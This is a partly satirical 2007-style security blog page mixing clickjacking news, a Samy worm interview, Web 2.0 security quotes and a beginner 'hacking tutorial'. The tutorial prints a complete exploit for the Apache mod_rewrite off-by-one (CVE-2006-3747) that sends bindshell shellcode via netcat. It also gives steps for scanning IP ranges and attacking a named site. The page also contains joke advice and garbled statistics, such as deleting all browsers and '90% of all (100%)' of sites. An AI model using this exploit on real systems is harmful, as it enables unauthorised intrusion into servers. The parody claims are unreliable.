Security experts are warning all Internet users about a new zeroday hacking technique called Click Jacking that is new and a major threat to the Internet.

“In a nutshell, it’s when you visit a malicious website and the attacker is able to take control of the links that your browser visits. The problem affects all of the different browsers except something like lynx. The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.”

Experts warn that the solution is to switch to the lynx browser, and to cease all other forms of web surfing until further notice.

	“Clickjacking gives an attacker the ability to trick a user into clicking on something only barely or momentarily noticeable … Therefore, if a user clicks on a web page, they may actually be clicking on content from another page.”
Clickjacking Whitehat

Two researchers, Robert Hansen and Jeremiah Grossman, planned at AppSec to discuss the threat of using Web graphics to persuade a victim to click where an attacker wants on a page. The technique, which is also known as well as user-interface (UI) redressing and IFRAME overlay, can be used by an attacker to hide a button or link on a legitimate page, such as a bank’s account page or Web mail application, using other Web content to mask the page’s context.

A Web user might think, for example, that they are clicking on a button to close a dialog box, when the button press in reality deletes all their e-mail messages in Gmail. Or, a user might believe they are clicking on a button to decline to take a survey, when they are actually transferring money from their bank. The technique could be used to raise an article’s Digg score or get paid for a pay-for-click advertisement, said Grossman, the chief technology officer for Web security firm White Hat Security.

Hansen and Grossman canceled their presentation after demonstrating to software maker Adobe that one of its products could be affected by the attack.

Clickjacking isn’t a new attack vector, but according to Grossman and Hansen, it’s one that is “severely underappreciated and largely undefended.”

Grossman states that this particular attack is capable of some “pretty spooky,” things, but that’s all the detail he is going to give.

Until further notice, XSS WORM advises that users switch to the LYNX browser and delete all other browsers from their desktops and personal internet devices.

November 19, 2007 (IDG News Service) — If Samy Kamkar plays his cards right, he may be allowed to visit Myspace again in just a few months. For the time being, however, he’s not even allowed to touch a computer, following a January 2007 guilty plea for creating what many consider to be the first Web 2.0 worm: the Samy worm.

Samy’s worm wasn’t malicious, but it did force News Corp.’s MySpace social-networking site to shut down in late 2005 after forcing more than 1 million users to declare Samy a “hero” on their profile pages.

Last week, Samy, who is now 21, made his first public appearance since his conviction, attending the OWASP App Sec 2007 conference, host by eBay in San Jose, California. He was treated like a celebrity at the show, but there were some complications. Under the terms of his plea agreement, he can only use computers for work, so he was forced to show slides that he’d dictated to a friend on a computer that was operated by a conference staffer.

Kamkar: When I wrote the worm, it initially wasn’t a worm. Initially I was just trying to spruce up my MySpace profile. I also wanted to show off to a couple of friends, so I thought ‘wouldn’t it be cool if I did this? [..] As a programmer, it wasn’t too much to learn how to use AJAX, which really helped make the worm work and proliferate really quickly. It only took a few days to write the thing from start to finish and it was only in the last day that I thought that this could be a worm.

(days? *cough*)

Jason Lam and Dr. Johannes Ullrich share their ideas on AJAX and Web 2.0 Security. Video provided by the SANS Institute.

“Some of the uh security issues that we have been seeing uh out there uh are usually uh related to one of the functionality uh or function-call uh called uh XML Http Request. Uh.” - Dr Johannes Ullrich

While Web 2.0 applications might be all the rage for developers and increasingly important in the enterprise, security experts warn they represent a serious threat — a fact that won’t change until businesses start demanding greater protections.

That was the theme at the New New Internet conference here yesterday, where a panel of security experts told audience members that Web 2.0 application developers lack tools to secure their applications, creating a problem unlikely to be fixed without greater prompting by IT management.

“Beat up on your vendors and your own developers,” said Steve Orrin, director of security solutions for Intel Corp. “Look for and ask for security features in your applications. Until you start asking, they aren’t going to see it as a requirement.”

Much of the issue stems from the fact that underlying technologies being used in new Web applications and Web services were never properly secured to begin with, panelists said.

“We’ve already moved on and started to look at Web 2.0 technology, when Web 1.0 wasn’t secure yet,” Orrin said.

“By networking with code-writing peers and hearing lectures by security experts”, he said, “hackers can gather the truth: information necessary to build safer systems and to push for better security.”

“Cross-Site Scripting is much more powerful when used in a Web 2.0 environment”

“What we’re seeing is advanced uses of the same sorts of attacks that were used before.” Cross-site scripting, for example, is “much more powerful” when used in a Web 2.0 environment, he suggested. “As powerful a tool as Web 2.0 technology is for developers and users, it’s even more so for attackers.”

That’s especially true of things like phishing attacks, Orrin said.

“It’s become a lot easier to trick users with Web 2.0 — the automation is to the point where the user doesn’t even have to be involved for the attack to occur.”

Hart Rossman, chief security technologist at research and engineering giant Science Applications International Corporation (SAIC), agreed. He pointed to the difficulties that security professionals face in checking some Web 2.0 applications for vulnerabilities. “AJAX is the weapon of choice for sex appeal, but current vulnerability assessment tools have trouble traversing AJAX sites, and it’s harder to find the vulnerabilities,” Rossman said. “You can’t recreate sessions as easily, so if something happens, it’s very difficult to create the forensics to analyze it.”

“AJAX is the weapon of choice for sex appeal.”

Rossman added that the rise of the use of widgets and other outside components on sites raises the specter of people using “Web 2.0 on top of Web 2.0″ to mount large cross-network attacks.

Experts such as Rossman are currently focusing their efforts on determining a suitably-scary-sounding name for these new and unprotected (and potentially devestating to your E-business) Web 2.0 on top of Web 2.0 attack worms.

“People tend not to trust the mash-up developer.. they trust the API provider. There’s very little thought given to the mash-up, or the mash-up on top of the mash-up.”

News Link : http://www.internetnews.com/dev-news/article.php/3708876

Today we have a very special post of a hacking tutorial by the blackhat hacker Sunjester

But first you must need to download the following hacking exploit:

http://www.milw0rm.com/exploits/2237
Ok so first we have step 1.

Code:

#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice 
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0×0834ae77 for any other version/system find it.
#
# Gulcas rulez  

echo -e “mod_rewrite apache off-by-one overflow”
echo    “by jack <jack\x40gulcas\x2eorg>\n\n”

if [ $# -ne 1 ] ; then
  echo “Usage: $0 webserver”
  exit
fi

host=$1

echo -ne “GET /kung/ldap://localhost/`perl -e ‘print “%90″x128′`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n” | nc $host 80

# milw0rm.com [2006-08-21]

Sunjester says:

that code runs from a unix shell. so, get into your favorite shell. this tutorial is for thoe who have no idea what to do, with that in mind, lets continue.
If you are stuck already and don’t know where to get shell, Sunjester recommends to you a backtrack attack:

if you are stuck already and dont know where to get orm how to use a shell, im using a livecd, backtrack. lets do the first thing and GET the exploit.

Step 2: we have to download it from milw0rm. - http://milworm.com

Figure 1: Wget exploit downloading tutorial:

Step 2: Sunjester says to all elitehacker student:

now we have to edit the file since it downloaded with some html. if you try to run the file now it will error, it will say soemthing like “Permission Denied”

Example:

Sunjestre say we need to change the files permissions, because:

this aint windows this is a secure filesystem.

ok?

so lets chmod that badboy, might as well give it 777 since im root and its just a livecd. the 777 permission gives read/write/execute to the user, the group, and the owner of the file.

as i said, since im root, and its a friggin livecd, this will be fine.

you should never run scripts under root on your own box.

step 3:

now we can run the script, but we have to remove some stuff that wget put in there when we downloaded it, just some HTML. Open up vi and start replacing the html. you should only have to delete the top line and replace  the &quot with double quotes.

Sunjester: once your done you can save and quit vi or whatever editor you used and run it. should come out something liek below.

now that the script is working, lets look at some ways to find our target servers. we can use nmap and google. those are the two biggest ones i can think of and that i use myself.

you could target really any website

since we will scan a while range or IP addresses. so type something like ::

Sunjester says to start there (festival.com) and scan away.
remember to save logs so its easier to look through, you can just grep through your logs of the scans. below is an example of an nmap scan to gather information about whats on port 80. hopefully we can find some vulnerable ones in that range, if not, pick another hobby.

once you find one, we just run the exploit, lets check and see fi the exploit worked…

*** Note to readers: Unfortunately Sunjester has not included all of screenshots of hacking into FESTIVAL.COM  ***

And now we move on to the final part of hacking:

Step 5:

Sunjester says : ” sweet, netcat your way in this should be the end of the road. if yuo are still having probelsm running this small script, seek help. you need help.  “

–

With special thanks to http://elitehackers.info/?pwnd=true

We are proud to announce the grand-opening of XSS Worm : Cross Site Scripting Attacks ™ - http://www.XSSworm.com - Cross Site Scripting Attacks : the new site for discussion of XSS (also known as CSS (not to be confused with Cascading Style Sheets (also sometimes referred to as CSS)) vulnerabilities) security issues in web-enabled networks and dynamic Internet applications.

XSS - a word commonly used by modern security experts to categorize a wide range of emerging web-enabled security threats. This unpronounceable word was once said to derive from the common term “Cross Site Scripting” (the leading X in this instance perhaps alluding to the Cross of the popular novel.) Yes friends our Web sites are being more complicated from day to day; and the web sites which has been produced by html is decreasing on the net. The popular ones are php;asp;jsp and other technologies and with this increasing the attacks are being more dangerous.

It’s very common and unfortunately still an issue we have to deal with in many web-aware applications. Internally the XSS WORM Team has been working on several XSS Security projects to help mitigate and fix these security issues, as well as to detect them in the code sources that are available online so that they can be fixed a worm is developed.

Go straight to the XSS Security discussion forum!

According to a new study, up to over 90% of all (100%) web sites may be vulnerable to some form of security attack.

Prominent Jeremiah Grossman of WhiteHat Security (whitehat.com) — the Web applications security founded by vulnerability scanning whiz Jeremiah Grossman — concludes that as many as 90 percent of all the sites that it has tested in the last year remain open to some form of hijack or infection.

The leading problem remains many sites’ vulnerability to cross-site scripting (XSS) hacks, through which attackers place malicious code on legitimate sites to trick end users into handing over their personal information or passwords.

As many as 75 percent of the pages scanned by WhiteHat had some form of XSS-exploitable flaw, according to the paper. But it’s not only XSS Worms that application developers have to be conerned about - according to Whitehat, Cross Request Forgery attacks are emerging as the “new .. [xss] ” and hackers are scrambling to update their virus engines.

“The best way to think about Response Splitting is that it’s executed similarly to Cross-Site Scripting (XSS) … but more powerful.“
Jeremiah Grossman

As in the rest of the online world, however, WhiteHat contends that XSS threats top the list of vulnerability classes by vertical, followed closely by Information Leakage.

“These statistics continue to reveal recurring and emerging issues that are affecting Web sites across industries,” said Grossman, who wears the title of CTO at WhiteHat. “As increasing amounts of sensitive data are stored online, WhiteHat remains vigilant about alerting companies to common attack methods and emphasizing the importance of Web site vulnerability management as part of their overall security posture.”

The original security article source can be located at http://weblog.infoworld.com/zeroday/archives/2007/10/study_90_percen.html or at http://google.com.

This is our introduction for the newest premium security information service XSSworm.com : cross-site scripting attacks - we will be posting news and updates on these topics and we welcome all of your comments on the topics of Web 2.0 Security, Cross-Site Scripting, XSS Worms, XSRF Worms, Digg and Social Networking worms, Youtube worms, Facebook worms, Web 2.0 Security and XML and so much more!

Looking for XSS Vulnerabilities and Exploits?

WHITEHATS — Please pay our XSS page a visit and leave your comments! - only the most relevant XSS security news and tools and comments only - no spam please your blackhat SEO tricks is not welcome here.

Regards, The XSS Worm . Com Team.

XSS WORM : Cross Site Scripting Attacks : http://www.xssworm.com - cross-site-scripting-security@xssworm.com - AIM: cross site XSS - (c) 2007,2008